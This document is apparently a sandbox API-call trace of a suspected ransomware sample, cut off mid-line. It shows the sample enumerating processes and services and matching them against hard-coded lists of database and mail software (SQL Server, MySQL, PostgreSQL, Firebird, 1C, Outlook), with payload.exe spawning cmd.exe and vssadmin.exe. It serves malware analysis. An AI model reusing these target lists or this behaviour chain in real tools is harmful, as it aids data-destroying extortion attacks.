[0035.860] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="VSS") returned -1 [0035.860] lstrcmpiW (lpString1="sqlwriter", lpString2="VSS") returned -1 [0035.860] lstrcmpiW (lpString1="mssqlserver", lpString2="VSS") returned -1 [0035.860] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="VSS") returned -1 [0035.860] lstrlenW (lpString="WdiServiceHost") returned 14 [0035.860] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiServiceHost") returned -1 [0035.860] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiServiceHost") returned -1 [0035.860] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiServiceHost") returned -1 [0035.860] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiServiceHost") returned -1 [0035.860] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiServiceHost") returned -1 [0035.860] lstrlenW (lpString="WdiSystemHost") returned 13 [0035.860] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiSystemHost") returned -1 [0035.860] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiSystemHost") returned -1 [0035.860] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiSystemHost") returned -1 [0035.860] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiSystemHost") returned -1 [0035.860] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiSystemHost") returned -1 [0035.860] lstrlenW (lpString="WinHttpAutoProxySvc") returned 19 [0035.860] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0035.860] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1 [0035.860] lstrcmpiW (lpString1="sqlwriter", lpString2="WinHttpAutoProxySvc") returned -1 [0035.860] lstrcmpiW (lpString1="mssqlserver", lpString2="WinHttpAutoProxySvc") returned -1 [0035.860] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WinHttpAutoProxySvc") returned -1 [0035.860] lstrlenW (lpString="Winmgmt") returned 7 [0035.860] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Winmgmt") returned -1 [0035.860] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Winmgmt") returned -1 [0035.860] lstrcmpiW (lpString1="sqlwriter", lpString2="Winmgmt") returned -1 [0035.860] lstrcmpiW (lpString1="mssqlserver", lpString2="Winmgmt") returned -1 [0035.860] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Winmgmt") returned -1 [0035.860] lstrlenW (lpString="WPDBusEnum") returned 10 [0035.860] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WPDBusEnum") returned -1 [0035.861] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WPDBusEnum") returned -1 [0035.861] lstrcmpiW (lpString1="sqlwriter", lpString2="WPDBusEnum") returned -1 [0035.861] lstrcmpiW (lpString1="mssqlserver", lpString2="WPDBusEnum") returned -1 [0035.861] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WPDBusEnum") returned -1 [0035.861] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x385af18 | out: hHeap=0x5d0000) returned 1 [0035.861] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x160 [0035.863] Process32FirstW (in: hSnapshot=0x160, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0035.864] Process32NextW (in: hSnapshot=0x160, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4f, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0035.865] lstrlenW (lpString="System") returned 6 [0035.865] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0035.865] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0035.865] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0035.865] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0035.865] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0035.865] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0035.865] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0035.865] Process32NextW (in: hSnapshot=0x160, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0035.865] lstrlenW (lpString="smss.exe") returned 8 [0035.865] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0035.865] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0035.866] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0035.866] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0035.866] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0035.866] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0035.866] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0035.866] Process32NextW (in: hSnapshot=0x160, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0035.866] lstrlenW (lpString="csrss.exe") returned 9 [0035.866] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0035.866] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0035.866] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0035.866] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0035.866] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0035.866] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0035.867] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0035.867] Process32NextW (in: hSnapshot=0x160, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0035.867] lstrlenW (lpString="wininit.exe") returned 11 [0035.867] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0035.867] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0035.867] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0035.867] lstrcmpiW (lpString1="postgres.exe", lpString2="wininit.exe") returned -1 [0035.867] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="wininit.exe") returned -1 [0035.867] lstrcmpiW (lpString1="mysqld.exe", lpString2="wininit.exe") returned -1 [0035.867] lstrcmpiW (lpString1="sqlservr.exe", lpString2="wininit.exe") returned -1 [0035.867] Process32NextW (in: hSnapshot=0x160, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0035.868] lstrlenW (lpString="csrss.exe") returned 9 [0035.868] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0035.868] Process32NextW (in: hSnapshot=0x160, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0035.869] lstrlenW (lpString="winlogon.exe") returned 12 [0035.869] Process32NextW (in: hSnapshot=0x160, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0035.870] lstrlenW (lpString="services.exe") returned 12 [0035.870] Process32NextW (in: hSnapshot=0x160, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0035.870] lstrlenW (lpString="lsass.exe") returned 9 [0035.871] Process32NextW (in: hSnapshot=0x160, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0035.871] lstrlenW (lpString="lsm.exe") returned 7 [0035.871] Process32NextW (in: hSnapshot=0x160, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0035.872] lstrlenW (lpString="svchost.exe") returned 11 [0035.872] Process32NextW (in: hSnapshot=0x160, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0035.873] lstrlenW (lpString="svchost.exe") returned 11 [0035.873] Process32NextW (in: hSnapshot=0x160, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0035.873] lstrlenW (lpString="svchost.exe") returned 11 [0035.873] Process32NextW (in: hSnapshot=0x160, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0035.874] lstrlenW (lpString="svchost.exe") returned 11 [0035.874] Process32NextW (in: hSnapshot=0x160, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x27, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0035.875] lstrlenW (lpString="svchost.exe") returned 11 [0035.875] Process32NextW (in: hSnapshot=0x160, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0035.882] lstrlenW (lpString="audiodg.exe") returned 11 [0035.882] Process32NextW (in: hSnapshot=0x160, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0035.883] lstrlenW (lpString="svchost.exe") returned 11 [0035.883] Process32NextW (in: hSnapshot=0x160, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0035.884] lstrlenW (lpString="svchost.exe") returned 11 [0035.884] Process32NextW (in: hSnapshot=0x160, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0035.884] lstrlenW (lpString="dwm.exe") returned 7 [0035.884] Process32NextW (in: hSnapshot=0x160, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0035.885] lstrlenW (lpString="explorer.exe") returned 12 [0035.885] Process32NextW (in: hSnapshot=0x160, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0035.886] lstrlenW (lpString="spoolsv.exe") returned 11 [0035.886] Process32NextW (in: hSnapshot=0x160, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0035.887] lstrlenW (lpString="taskhost.exe") returned 12 [0035.887] Process32NextW (in: hSnapshot=0x160, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0035.887] lstrlenW (lpString="svchost.exe") returned 11 [0035.887] Process32NextW (in: hSnapshot=0x160, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0035.888] lstrlenW (lpString="taskeng.exe") returned 11 [0035.888] Process32NextW (in: hSnapshot=0x160, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0035.889] lstrlenW (lpString="taskhost.exe") returned 12 [0035.889] Process32NextW (in: hSnapshot=0x160, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x78c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="carried trinity.exe")) returned 1 [0035.889] lstrlenW (lpString="carried trinity.exe") returned 19 [0035.889] Process32NextW (in: hSnapshot=0x160, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="heaven.exe")) returned 1 [0035.890] lstrlenW (lpString="heaven.exe") returned 10 [0035.890] Process32NextW (in: hSnapshot=0x160, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dell.exe")) returned 1 [0035.891] lstrlenW (lpString="dell.exe") returned 8 [0035.891] Process32NextW (in: hSnapshot=0x160, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="consequence lonely nato.exe")) returned 1 [0035.892] lstrlenW (lpString="consequence lonely nato.exe") returned 27 [0035.892] Process32NextW (in: hSnapshot=0x160, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="gotten_commit_philip.exe")) returned 1 [0035.892] lstrlenW (lpString="gotten_commit_philip.exe") returned 24 [0035.892] Process32NextW (in: hSnapshot=0x160, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x344, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="til ear equal.exe")) returned 1 [0035.893] lstrlenW (lpString="til ear equal.exe") returned 17 [0035.893] Process32NextW (in: hSnapshot=0x160, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x244, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="itunes-bring.exe")) returned 1 [0035.894] lstrlenW (lpString="itunes-bring.exe") returned 16 [0035.894] Process32NextW (in: hSnapshot=0x160, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="tide_instances_ee.exe")) returned 1 [0035.894] lstrlenW (lpString="tide_instances_ee.exe") returned 21 [0035.894] Process32NextW (in: hSnapshot=0x160, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="philadelphia.exe")) returned 1 [0036.294] lstrlenW (lpString="philadelphia.exe") returned 16 [0036.294] Process32NextW (in: hSnapshot=0x160, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="litigation_rows_careers.exe")) returned 1 [0036.295] lstrlenW (lpString="litigation_rows_careers.exe") returned 27 [0036.295] Process32NextW (in: hSnapshot=0x160, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x518, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ict virginia cameras.exe")) returned 1 [0036.296] lstrlenW (lpString="ict virginia cameras.exe") returned 24 [0036.296] Process32NextW (in: hSnapshot=0x160, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x438, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fraud stuck.exe")) returned 1 [0036.297] lstrlenW (lpString="fraud stuck.exe") returned 15 [0036.297] Process32NextW (in: hSnapshot=0x160, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="innovative-essential-very.exe")) returned 1 [0036.298] lstrlenW (lpString="innovative-essential-very.exe") returned 29 [0036.298] Process32NextW (in: hSnapshot=0x160, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="attended.exe")) returned 1 [0036.298] lstrlenW (lpString="attended.exe") returned 12 [0036.298] Process32NextW (in: hSnapshot=0x160, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="tolerance-cartridges.exe")) returned 1 [0036.299] lstrlenW (lpString="tolerance-cartridges.exe") returned 24 [0036.299] Process32NextW (in: hSnapshot=0x160, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pan physician.exe")) returned 1 [0036.300] lstrlenW (lpString="pan physician.exe") returned 17 [0036.300] Process32NextW (in: hSnapshot=0x160, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="yesterday_sagem_indexes.exe")) returned 1 [0036.301] lstrlenW (lpString="yesterday_sagem_indexes.exe") returned 27 [0036.301] Process32NextW (in: hSnapshot=0x160, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x588, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="graphsheadlinehull.exe")) returned 1 [0036.302] lstrlenW (lpString="graphsheadlinehull.exe") returned 22 [0036.302] Process32NextW (in: hSnapshot=0x160, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x440, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="over-celebrity.exe")) returned 1 [0036.303] lstrlenW (lpString="over-celebrity.exe") returned 18 [0036.303] Process32NextW (in: hSnapshot=0x160, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0036.303] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0036.303] Process32NextW (in: hSnapshot=0x160, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0036.304] lstrlenW (lpString="dllhost.exe") returned 11 [0036.304] Process32NextW (in: hSnapshot=0x160, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x944, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0036.305] lstrlenW (lpString="dllhost.exe") returned 11 [0036.305] Process32NextW (in: hSnapshot=0x160, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x964, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="payload.exe")) returned 1 [0036.306] lstrlenW (lpString="payload.exe") returned 11 [0036.306] Process32NextW (in: hSnapshot=0x160, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x970, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x964, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0036.306] lstrlenW (lpString="cmd.exe") returned 7 [0036.306] Process32NextW (in: hSnapshot=0x160, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x988, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x188, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0036.307] lstrlenW (lpString="conhost.exe") returned 11 [0036.307] Process32NextW (in: hSnapshot=0x160, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x970, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1 [0036.308] lstrlenW (lpString="vssadmin.exe") returned 12 [0036.308] Process32NextW (in: hSnapshot=0x160, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="VSSVC.exe")) returned 1 [0036.309] lstrlenW (lpString="VSSVC.exe") returned 9 [0036.309] Process32NextW (in: hSnapshot=0x160, lppe=0x21afd34 | out: lppe=0x21afd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="VSSVC.exe")) returned 0 [0036.310] CloseHandle (hObject=0x160) returned 1 [0036.310] Sleep (dwMilliseconds=0x1f4) [0036.899] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x626be0 [0036.900] EnumServicesStatusExW (in: hSCManager=0x626be0, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x21aff44, lpServicesReturned=0x21aff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x21aff44, lpServicesReturned=0x21aff5c, lpResumeHandle=0x0) returned 0 [0036.901] GetLastError () returned 0xea [0036.901] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x123e) returned 0x6c4f10 [0036.901] EnumServicesStatusExW (in: hSCManager=0x626be0, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x6c4f10, cbBufSize=0x123e, pcbBytesNeeded=0x21aff44, lpServicesReturned=0x21aff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x6c4f10, pcbBytesNeeded=0x21aff44, lpServicesReturned=0x21aff5c, lpResumeHandle=0x0) returned 1 [0036.902] CloseServiceHandle (hSCObject=0x626be0) returned 1 [0036.902] lstrlenW (lpString="Appinfo") returned 7 [0036.902] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0036.902] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0036.902] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0036.902] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0036.902] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0036.902] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0036.902] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 